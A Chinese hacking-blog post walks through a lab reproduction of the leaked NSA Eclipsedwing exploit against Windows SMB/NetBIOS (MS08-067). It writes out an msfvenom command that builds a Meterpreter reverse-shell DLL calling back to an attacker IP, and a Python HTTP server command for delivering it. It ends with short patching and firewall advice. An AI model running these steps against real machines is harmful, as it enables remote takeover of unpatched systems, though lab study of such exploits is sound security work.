记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

NSA武器库之Eclipsedwing复现

2017-06-21 11:25

导语
自shadow Brokers公布NSA泄露工具后,各路大神陆陆续续发表泄露工具各种exp复现过程,又WannaCry、EternalRocks勒索病毒的肆虐,无一不表现出泄露工具的威力,但泄露工具中光exploit就达15个,网络上搜索到的复现教程也就6个(Eternalblue,Eternalchampion,Eternalromance,Explodingcan,Esteemaudit,Easybee),还有一大半没有相关资料。那剩下的一大半就不重要吗?显然不是,NSA工具集值得学习的地方还有好多,于是有了今天的文章,有何不妥之处请各路大神指教!
前期准备

靶机环境

Eclipsedwin漏洞复现过程
Use Eclipsedwin

设置目标IP、端口和NetBIOSName,NetBIOSName是计算机的标识名,该名字主要用于局域网中计算机之间的相互访问,可通过在cmd下输入hostname获得。

然后基本默认,

Rpctouch Succeeded


Eclipsedwingtouch Succeeded



这时候在靶机上已经产生了一条连接

利用Pcdlllauncher注入dll
使用Pcdlllauncher

需要注意的是LPEntryname的路径需要真实存在,找到自己对应的文件进行修改。
然后使用生成用于反弹shell的dll payload:
并使用python创建一个HTTP服务器,方便攻击机下载payload,
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.128 lport=8090 --platform windows -f dll -o eclipsedwin.dll
python -m SimpleHTTPServer 9090


攻击机创建tmp目录,并将eclipsedwin_exe.dll下载到tmp目录下,然后进行配置,对PCBehavior选项选0

然后执行

运行提示“FAILED TO DUPLICATE SOCKET”,但payload已经在靶机上运行了。查看metasploit,成功返回shell

Eclipsedwin支持的系统


NBT协议即net bios over TCP/IP,属于SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。NBT(NetBIOS over TCP/IP) 使用137(UDP), 138(UDP) and 139 (TCP)来实现基于TCP/IP的NETBIOS网际互联。
防范手段
安装MS08-067补丁,开启防火墙过滤137-139,445端口,关闭SMB服务。
 

知识来源: www.2cto.com/article/201706/650363.html

阅读:87030 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“NSA武器库之Eclipsedwing复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云